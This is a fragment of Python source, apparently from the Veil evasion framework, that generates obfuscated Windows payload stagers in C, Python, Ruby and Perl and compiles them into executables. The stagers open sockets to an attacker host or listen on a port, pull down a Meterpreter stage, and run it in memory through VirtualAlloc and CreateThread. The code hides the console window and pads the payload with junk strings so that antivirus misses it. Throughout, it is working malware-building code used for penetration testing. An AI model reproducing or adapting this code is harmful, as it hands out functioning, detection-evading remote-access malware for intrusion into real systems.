number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
# real code
code += "%s = %s(%s, %s + %s, %s);" % (
count_name, recv_all_name, my_socket_name, buffer_name,
evasion_helpers.obfuscateNum(5, 2), size_name)
code += "%s = (void (*)())%s;" % (function_name, buffer_name)
code += "%s();" % (function_name)
# third string obfuscation method (never called)
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
code += "return 0;}\n"
self.payload_source_code = code
return
def compiler(payload_object, invoked=False, cli_object=None):
# Check the source code to ensure it is present
if payload_object.payload_source_code == '':
print(helpers.color("\n [!] ERROR: No payload source code provided.\n", warning=True))
return False
else:
# print title bar
evasion_helpers.title_screen()
if not invoked:
# Determine the file name to use for output
file_name = input(' [>] Please enter the base name for output files (default is payload): ').strip()
else:
file_name = cli_object.o
# Basic checks on input
while file_name != '' and ("\\" in file_name or "/" in file_name):
print(helpers.color("\nPlease provide a base name, not a path, for the output base\n", warning=True))
file_name = input(' [>] Please enter the base name for output files (default is payload): ').strip()
# If no base name, set it to be payload
if file_name == '':
file_name = 'payload'
# run check to make sure file doesn't exist, if it does
# provide a new filename
file_name = find_file_name(file_name, payload_object)
source_code_filepath = settings.PAYLOAD_SOURCE_PATH + file_name + "." + payload_object.extension
# Used when outputting exe files, go figure
executable_filepath = settings.PAYLOAD_COMPILED_PATH + file_name + ".exe"
if payload_object.language is not "native" and payload_object.extension is not "war":
with open(source_code_filepath, 'w') as source_file:
source_file.write(payload_object.payload_source_code)
if payload_object.language == 'python':
if not invoked:
compile_method = ""
else:
compile_method = cli_object.compiler
# Check extension for war or normal python file
if payload_object.extension == 'py':
if settings.OPERATING_SYSTEM == "Windows":
compile_method = 'py2exe'
else:
if payload_object.required_options['COMPILE_TO_EXE'][0].lower() == 'y' and not invoked:
evasion_helpers.title_screen()
# if we have a linux distro, continue...
# Determine if the user wants PyInstaller, Pwnstaller, or Py2Exe.
print(' [?] How would you like to create your payload executable?\n')
print(' %s - PyInstaller %s' % (helpers.color('1'), helpers.color('(default)', yellow=True)))
print(' %s - Py2Exe\n' % (helpers.color('2')))
user_compile_choice = input(" [>] Please enter the number of your choice: ")
if user_compile_choice == "1" or user_compile_choice == '':
compile_method = "pyinstaller"
elif user_compile_choice == "2":
compile_method = "py2exe"
else:
compile_method = "pyinstaller"
if compile_method == 'py2exe' and payload_object.required_options['COMPILE_TO_EXE'][0].lower() == 'y':
# Generate setup.py File for Py2Exe
with open(settings.PAYLOAD_SOURCE_PATH + '/setup.py', 'w') as setup_file:
setup_file.write("from distutils.core import setup\n")
setup_file.write("import py2exe, sys, os\n\n")
setup_file.write("setup(\n")
setup_file.write("\toptions = {'py2exe': {'bundle_files': 1}},\n")
setup_file.write("\tzipfile = None,\n")
setup_file.write("\twindows=['" + file_name + ".py']\n")
setup_file.write(")")
# Generate Batch script for Compiling on Windows Using Py2Exe
with open(settings.PAYLOAD_SOURCE_PATH + '/runme.bat', 'w') as runme_file:
runme_file.write('rem Batch Script for compiling python code into an executable\n')
runme_file.write('rem on windows with py2exe\n')
runme_file.write('rem Usage: Drop into your Python folder and click, or anywhere if Python is in your system path\n\n')
runme_file.write("python setup.py py2exe\n")
runme_file.write('cd dist\n')
runme_file.write('move ' + file_name + '.exe ../\n')
runme_file.write('cd ..\n')
runme_file.write('rmdir /S /Q build\n')
runme_file.write('rmdir /S /Q dist\n')
evasion_helpers.title_screen()
print_payload_information(payload_object)
print(helpers.color("\npy2exe files 'setup.py' and 'runme.bat' written to:\n" + settings.PAYLOAD_SOURCE_PATH + "\n"))
else:
if payload_object.required_options['COMPILE_TO_EXE'][0].lower() == 'y':
# Used for PyInstaller standard
# copy the pyinstaller runw to maintain its integrity in the event
# pwnstaller is added in for python3 - this will future proof it
runw_path = settings.VEIL_PATH + '/tools/evasion/evasion_common/tools/runw.orig.exe'
os.system('cp ' + runw_path + ' ' + settings.PYINSTALLER_PATH + 'PyInstaller/bootloader/Windows-32bit/runw.exe')
# Validate python is installed in wine
if not os.path.isfile(settings.WINEPREFIX + 'drive_c/Python34/python.exe'):
print(helpers.color("\n [!] ERROR: Can't find python.exe in " + os.path.expanduser(settings.WINEPREFIX + 'drive_c/Python34/'), warning=True))
print(helpers.color(" [!] ERROR: Make sure the python.exe binary exists before using PyInstaller.", warning=True))
sys.exit(1)
random_key = evasion_helpers.randomString()
os.system('WINEPREFIX=' + settings.WINEPREFIX + ' wine ' + settings.WINEPREFIX + '/drive_c/Python34/python.exe' + ' ' + os.path.expanduser(settings.PYINSTALLER_PATH + '/pyinstaller.py') + ' --onefile --noconsole --key ' + random_key + ' ' + source_code_filepath)
evasion_helpers.title_screen()
if os.path.isfile('dist/' + file_name + ".exe"):
os.system('mv dist/' + file_name + ".exe " + settings.PAYLOAD_COMPILED_PATH)
hash_executable(executable_filepath, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " + helpers.color(settings.PAYLOAD_COMPILED_PATH + file_name + ".exe"))
else:
print(helpers.color(" [!] ERROR: Unable to create output file.", warning=True))
os.system('rm -rf dist')
os.system('rm -rf build')
os.system('rm -f *.spec')
os.system('rm -f logdict*.*')
print(" [*] Source code written to: " + helpers.color(source_code_filepath))
elif payload_object.extension == 'war':
path_here = settings.PAYLOAD_COMPILED_PATH + file_name + "." + payload_object.extension
with open(path_here, 'wb') as source_file:
source_file.write(payload_object.payload_source_code)
# Ensure that war file was written to disk
if os.path.isfile(path_here):
hash_executable(path_here, file_name)
print_payload_information(payload_object)
print(" [*] WAR file written to: " + helpers.color(source_code_filepath))
else:
print(helpers.color(" [!] ERROR: Unable to create WAR file.", warning=True))
else:
print(helpers.color(" [!] ERROR: Invalid python extension in payload module.\n", warning=True))
elif payload_object.language == 'ruby':
if payload_object.required_options['COMPILE_TO_EXE'][0].lower() == 'y':
os.system('WINEPREFIX=' + settings.WINEPREFIX + ' wine ' + settings.WINEPREFIX + '/drive_c/Ruby187/bin/ruby.exe ' + settings.WINEPREFIX + '/drive_c/Ruby187/bin/ocra --windows '+ source_code_filepath + ' --output ' + executable_filepath + ' ' + settings.WINEPREFIX + '/drive_c/Ruby187/lib/ruby/gems/1.8/gems/win32-api-1.4.8-x86-mingw32/lib/win32/*')
evasion_helpers.title_screen()
if os.path.isfile(executable_filepath):
hash_executable(executable_filepath, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " + helpers.color(executable_filepath))
else:
print(helpers.color(" [!] ERROR: Unable to create output file.", warning=True))
print(" [*] Source code written to: " + helpers.color(source_code_filepath))
elif payload_object.language == 'powershell':
evasion_helpers.title_screen()
print_payload_information(payload_object)
print(" [*] PowerShell doesn't compile, so you just get text :)")
print(" [*] Source code written to: " + helpers.color(source_code_filepath))
elif payload_object.language == 'perl':
print_payload_information(payload_object)
print("\nPerl can't currently be compiled in Linux. Install on Windows:")
print("https://www.veil-framework.com/perl-of-no-hope-january-v-day-2016/")
print("Command: pp -gui -o <executablename> <sourcecodefile.pl>")
print(" [*] Source code written to: " + helpers.color(source_code_filepath))
elif payload_object.language == 'native':
# set path for native payload executable output
path_here = settings.PAYLOAD_COMPILED_PATH + file_name + "." + payload_object.extension
with open(path_here, 'wb') as source_file:
source_file.write(payload_object.payload_source_code)
# Ensure executables was written to disk
if os.path.isfile(path_here):
hash_executable(path_here, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " + helpers.color(path_here))
else:
print(helpers.color(" [!] ERROR: Unable to create Exe file.", warning=True))
elif payload_object.language == 'lua':
print_payload_information(payload_object)
print(" [*] Lua currently doesn't compile in linux, so you just get text :)")
print(" [*] Source code written to: " + helpers.color(source_code_filepath))
elif payload_object.language == 'go':
if payload_object.required_options['COMPILE_TO_EXE'][0].lower() == 'y':
# Compile go payload
os.system( 'env GOROOT={0} GOOS=windows GOARCH=386 {0}/bin/go build -ldflags "-s -w -H=windowsgui" -v -o {1} {2}'.format(settings.GOLANG_PATH, executable_filepath, source_code_filepath) )
evasion_helpers.title_screen()
if os.path.isfile(executable_filepath):
hash_executable(executable_filepath, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " + helpers.color(executable_filepath))
else:
print(helpers.color(" [!] ERROR: Unable to create output file.", warning=True))
print(" [*] Source code written to: " + helpers.color(source_code_filepath))
elif payload_object.language == 'cs':
if payload_object.required_options['COMPILE_TO_EXE'][0].lower() == 'y':
# Compile our CS code into an executable and pass a compiler flag to prevent it from opening a command prompt when run
os.system('mcs -platform:x86 -target:winexe ' + source_code_filepath + ' -out:' + executable_filepath)
evasion_helpers.title_screen()
if os.path.isfile(executable_filepath):
hash_executable(executable_filepath, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " + helpers.color(executable_filepath))
else:
print(helpers.color(" [!] ERROR: Unable to create output file.", warning=True))
print(" [*] Source code written to: " + helpers.color(source_code_filepath))
elif payload_object.language == 'c':
if payload_object.required_options['COMPILE_TO_EXE'][0].lower() == 'y':
# Compile our C code into an executable and pass a compiler flag to prevent it from opening a command prompt when run
os.system('i686-w64-mingw32-gcc -Wl,-subsystem,windows ' + source_code_filepath + ' -o ' + executable_filepath + " -lwsock32")
evasion_helpers.title_screen()
if os.path.isfile(executable_filepath):
hash_executable(executable_filepath, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " + helpers.color(executable_filepath))
else:
print(helpers.color(" [!] ERROR: Unable to create output file.", warning=True))
print(" [*] Source code written to: " + helpers.color(source_code_filepath))
elif payload_object.language == 'autoit':
if payload_object.required_options['COMPILE_TO_EXE'][0].lower() == 'y':
# Compile autoit code
os.system('WINEPREFIX=' + settings.WINEPREFIX + ' wine ' + settings.WINEPREFIX + 'drive_c/Program\ Files/AutoIt3/Aut2Exe/Aut2exe.exe /in ' + source_code_filepath + ' /out ' + executable_filepath + ' /comp 2 /nopack')
if os.path.isfile(executable_filepath):
hash_executable(executable_filepath, file_name)
print_payload_information(payload_object)
print(" [*] Executable written to: " + helpers.color(executable_filepath))
else:
print(helpers.color(" [!] ERROR: Unable to create output file.", warning=True))
print(" [*] Source code written to: " + helpers.color(source_code_filepath))
else:
print(helpers.color("\n [!] ERROR: Invalid payload language in payload module.\n", warning=True))
return False
if invoked:
handler_code_generator(payload_object, file_name, invoked=True, cli_obj=cli_object)
else:
handler_code_generator(payload_object, file_name)
if os.path.isfile(settings.HANDLER_PATH + file_name + '.rc'):
print(" [*] Metasploit Resource file written to: " + helpers.color(settings.HANDLER_PATH + file_name + '.rc'))
if not invoked:
dummy = input('\nHit enter to continue...\n')
# End of if statement checking to make sure payload_source_code is
# not empty
return True
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" %(getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" %(socketName)
payload_code += "\t\tglobal %s\n" %(clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketName)
payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += "\tif %s != None:\n" %(tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
winsock_init_name = evasion_helpers.randomString()
punt_name = evasion_helpers.randomString()
recv_all_name = evasion_helpers.randomString()
wsconnect_name = evasion_helpers.randomString()
# the real includes needed
includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>"]
# max length string for obfuscation
global_max_string_length = 10000
max_string_length = random.randint(100,global_max_string_length)
max_num_strings = 10000
# TODO: add in more string processing functions
randName1 = evasion_helpers.randomString() # reverse()
randName2 = evasion_helpers.randomString() # doubles characters
stringModFunctions = [ (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)),
(randName2, "char* %s(char* s){ char *result = malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2))
]
random.shuffle(stringModFunctions)
# obfuscation "logical nop" string generation functions
randString1 = evasion_helpers.randomString(50)
randName1 = evasion_helpers.randomString()
randVar1 = evasion_helpers.randomString()
randName2 = evasion_helpers.randomString()
randVar2 = evasion_helpers.randomString()
randVar3 = evasion_helpers.randomString()
randName3 = evasion_helpers.randomString()
randVar4 = evasion_helpers.randomString()
randVar5 = evasion_helpers.randomString()
stringGenFunctions = [ (randName1, "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}" %(randName1, randVar1, stringModFunctions[0][0], randString1, randVar1, randString1[25])),
(randName2, "char* %s(){ char %s[%s], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }" % (randName2, randVar2, max_string_length, randVar3, max_string_length, randVar2, evasion_helpers.randomString(50), randVar3, evasion_helpers.randomString(50), stringModFunctions[1][0], randVar2, randVar3)),
(randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, evasion_helpers.randomString(50), randVar5, randVar4, randVar5))
]
random.shuffle(stringGenFunctions)
# obfuscation - add in our fake includes
fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>",
"#include <limits.h>", "#include <assert.h>"]
for x in range(1, random.randint(1,7)):
includes.append(fake_includes[x])
# shuffle up real/fake includes
random.shuffle(includes)
code = "#define _WIN32_WINNT 0x0500\n"
code += "#include <winsock2.h>\n"
code += "\n".join(includes) + "\n"
#string mod functions
code += stringModFunctions[0][1] + "\n"
code += stringModFunctions[1][1] + "\n"
# build the winsock_init function
wVersionRequested_name = evasion_helpers.randomString()
wsaData_name = evasion_helpers.randomString()
code += "void %s() {" % (winsock_init_name)
code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, evasion_helpers.obfuscateNum(2,4), evasion_helpers.obfuscateNum(2,4), wsaData_name)
code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name)
# first logical nop string function
code += stringGenFunctions[0][1] + "\n"
# build punt function
my_socket_name = evasion_helpers.randomString()
code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name)
code += "closesocket(%s);" %(my_socket_name)
code += "WSACleanup();"
code += "exit(1);}\n"
# second logical nop string function
code += stringGenFunctions[1][1] + "\n"
# build recv_all function
my_socket_name = evasion_helpers.randomString()
buffer_name = evasion_helpers.randomString()
len_name = evasion_helpers.randomString()
code += "int %s(SOCKET %s, void * %s, int %s){" %(recv_all_name, my_socket_name, buffer_name, len_name)
code += "int slfkmklsDSA=0;int rcAmwSVM=0;"
code += "void * startb = %s;" %(buffer_name)
code += "while (rcAmwSVM < %s) {" %(len_name)
code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" %(my_socket_name, len_name)
code += "startb += slfkmklsDSA; rcAmwSVM += slfkmklsDSA;"
code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" %(punt_name, my_socket_name)
# third logical nop string function
code += stringGenFunctions[2][1] + "\n"
# build wsconnect function
target_name = evasion_helpers.randomString()
sock_name = evasion_helpers.randomString()
my_socket_name = evasion_helpers.randomString()
code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (wsconnect_name, target_name, sock_name, my_socket_name)
code += "%s = socket(AF_INET, SOCK_STREAM, 0);" %(my_socket_name)
code += "if (%s == INVALID_SOCKET) %s(%s);" %(my_socket_name, punt_name, my_socket_name);
code += "%s = gethostbyname(\"%s\");" %(target_name, self.required_options["LHOST"][0])
code += "if (%s == NULL) %s(%s);" %(target_name, punt_name, my_socket_name)
code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" %(sock_name, target_name, target_name)
code += "%s.sin_family = AF_INET;" %(sock_name)
code += "%s.sin_port = htons(%s);" %(sock_name, evasion_helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32))
code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
code += "return %s;}\n" %(my_socket_name)
# build main() code
size_name = evasion_helpers.randomString()
buffer_name = evasion_helpers.randomString()
function_name = evasion_helpers.randomString()
my_socket_name = evasion_helpers.randomString()
count_name = evasion_helpers.randomString()
# obfuscation stuff
char_array_name_1 = evasion_helpers.randomString()
number_of_strings_1 = random.randint(1,max_num_strings)
char_array_name_2 = evasion_helpers.randomString()
number_of_strings_2 = random.randint(1,max_num_strings)
char_array_name_3 = evasion_helpers.randomString()
number_of_strings_3 = random.randint(1,max_num_strings)
code += "int main(int argc, char * argv[]) {"
code += "ShowWindow( GetConsoleWindow(), SW_HIDE );"
code += "ULONG32 %s;" %(size_name)
code += "char * %s;" %(buffer_name)
code += "int i;"
code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
code += "void (*%s)();" %(function_name)
# malloc our first string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length))
code += "%s();" %(winsock_init_name)
code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name)
# malloc our second string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length))
code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (count_name, my_socket_name, size_name, evasion_helpers.obfuscateNum(4,2))
code += "if (%s != %s || %s <= 0) %s(%s);" %(count_name, evasion_helpers.obfuscateNum(4,2), size_name, punt_name, my_socket_name)
code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name, size_name, evasion_helpers.obfuscateNum(5,2))
code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
# first string obfuscation method
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
# real code
code += "if (%s == NULL) %s(%s);" %(buffer_name, punt_name, my_socket_name)
code += "%s[0] = 0xBF;" %(buffer_name)
code += "memcpy(%s + 1, &%s, %s);" %(buffer_name, my_socket_name, evasion_helpers.obfuscateNum(4,2))
# malloc our third string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length))
# second string obfuscation method
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
# real code
code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, evasion_helpers.obfuscateNum(5,2), size_name)
code += "%s = (void (*)())%s;" %(function_name, buffer_name)
code += "%s();" %(function_name)
# third string obfuscation method (never called)
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
code += "return 0;}\n"
self.payload_source_code = code
return
def generate(self):
payload_code = "require 'rubygems';require 'win32/api';require 'socket';include Win32\n"
# Add logic for adding this line, stupid bug and I have no idea
# why this is even a problem, but ruby is dumb
if self.required_options["HOSTNAME"][0] != "X" or self.required_options["DOMAIN"][0] != "X" or self.required_options["USERNAME"][0] != "X" or self.required_options["SLEEP"][0] != "X":
pass
else:
payload_code += "exit if Object.const_defined?(:Ocra)\n"
if self.required_options["HOSTNAME"][0] != "X" or self.required_options["DOMAIN"][0] != "X":
payload_code += 'require \'socket\'\n'
payload_code2, num_ends_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# randomly generate out variable names
payloadName = evasion_helpers.randomString()
ptrName = evasion_helpers.randomString()
threadName = evasion_helpers.randomString()
valloc_random = evasion_helpers.randomString()
rtlmove_random = evasion_helpers.randomString()
createthread_random = evasion_helpers.randomString()
waitfor_random = evasion_helpers.randomString()
heapcreate_random = evasion_helpers.randomString()
heapalloc_random = evasion_helpers.randomString()
heap_name = evasion_helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "$" + valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "$" + heapcreate_random + " = API.new('HeapCreate', 'III', 'I');$" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n"
payload_code += "$g_o = API.new('_get_osfhandle', 'I', 'I', 'msvcrt.dll')\n"
payload_code += "def g(ip,port)\n"
payload_code += "\tbegin\n"
payload_code += "\t\ts = TCPSocket.open(ip, port)\n"
payload_code += "\t\tpl = Integer(s.recv(4).unpack('L')[0])\n"
payload_code += "\t\tp = \" \"\n"
payload_code += "\t\twhile p.length < pl\n\t\tp += s.recv(pl) end\n"
payload_code += "\t\tp[0] = ['BF'].pack(\"H*\")\n"
payload_code += "\t\tsd = $g_o.call(s.fileno)\n"
payload_code += "\t\tfor i in 1..4\n\t\t\tp[i] = Array(sd).pack('V')[i-1] end\n"
payload_code += "\t\treturn p\n"
payload_code += "\trescue\n\treturn \"\"\n\tend\nend\n"
payload_code += "def ij(sc)\n"
payload_code += "\tif sc.length > 1000\n"
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "\t\tpt = $" + valloc_random + ".call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n"
payload_code += "\t\tx = $" + rtlmove_random + ".call(pt,sc,sc.length)\n"
payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,pt,0,0,0),0xFFFFFFF)\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "\t\t$" + heap_name + " = $" + heapcreate_random + ".call(0x0004,(sc.length > 0x1000 ? sc.length : 0x1000), 0)\n"
payload_code += "\t\t$" + ptrName + " = $" + heapalloc_random + ".call($" + heap_name + ", 0x00000008, sc.length)\n"
payload_code += "\t\tx = $" + rtlmove_random + ".call($" + ptrName + ",sc,sc.length)\n"
payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,$" + ptrName + ",0,0,0),0xFFFFFFF)\n"
payload_code += "\tend\nend\n"
payload_code += "ij(g(\"%s\",%s))\n" % (self.required_options["LHOST"][0], self.required_options["LPORT"][0])
# Close out all the if statements
for iteration in range(num_ends_required):
payload_code += 'end\n'
self.payload_source_code = payload_code
return
def generate(self):
# How I'm tracking the number of nested tabs needed
# to make the payload
num_ends_required = 0
payload_code = "use Win32::API;\n"
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
payload_code2, num_ends_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# randomly generate variable names
shellcode_variable = evasion_helpers.randomString()
ptrName = evasion_helpers.randomString()
rand_valloc = evasion_helpers.randomString()
rand_movemem = evasion_helpers.randomString()
rand_cthread = evasion_helpers.randomString()
rand_waitfor = evasion_helpers.randomString()
rand_heapcreate = evasion_helpers.randomString()
rand_heapalloc = evasion_helpers.randomString()
rand_thread = evasion_helpers.randomString()
rand_protect = evasion_helpers.randomString()
protect_out = evasion_helpers.randomString()
payload_code += '\t' * num_ends_required + "my $%s = \"%s\";\n" % (
shellcode_variable, Shellcode)
payload_code += '\t' * num_ends_required + "$" + rand_movemem + " = new Win32::API('kernel32', 'RtlMoveMemory', 'IPI', 'V');\n"
payload_code += '\t' * num_ends_required + "$" + rand_cthread + " = new Win32::API('kernel32', 'CreateThread', 'IIIIIP', 'I');\n"
payload_code += '\t' * num_ends_required + "$" + rand_waitfor + " = new Win32::API('kernel32', 'WaitForSingleObject', 'II', 'I');\n"
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_ends_required + "$" + rand_valloc + " = new Win32::API('kernel32', 'VirtualAlloc', 'IIII', 'I');\n"
payload_code += '\t' * num_ends_required + "$" + rand_protect + " = new Win32::API('kernel32', 'VirtualProtect', 'PIIP', 'I');\n"
payload_code += '\t' * num_ends_required + "my $" + ptrName + " = $" + rand_valloc + "->Call(0, length($" + shellcode_variable + "), 0x1000, 0x04);\n"
payload_code += '\t' * num_ends_required + "$" + rand_movemem + "->Call($%s, $%s, length($%s));\n" % (
ptrName, shellcode_variable, shellcode_variable)
payload_code += '\t' * num_ends_required + "my $" + protect_out + " = $" + rand_protect + "->Call(" + ptrName + ", length($" + shellcode_variable + "), 0x20, 0);\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
rand_heapcrout = evasion_helpers.randomString()
payload_code += '\t' * num_ends_required + "$" + rand_heapcreate + " = new Win32::API('kernel32', 'HeapCreate', 'III', 'I');\n"
payload_code += '\t' * num_ends_required + "$" + rand_heapalloc + " = new Win32::API('kernel32', 'HeapAlloc', 'III', 'I');\n"
payload_code += '\t' * num_ends_required + "my $" + rand_heapcrout + " = $" + rand_heapcreate + "->Call(0x00040000, length(" + shellcode_variable + ")*2, 0);\n"
payload_code += '\t' * num_ends_required + "my $" + ptrName + " = $" + rand_heapalloc + "->Call($" + rand_heapcrout + ", 0x00000008, length(" + shellcode_variable + "));\n"
payload_code += '\t' * num_ends_required + "$" + rand_movemem + "->Call($%s, $%s, length($%s));\n" % (
ptrName, shellcode_variable, shellcode_variable)
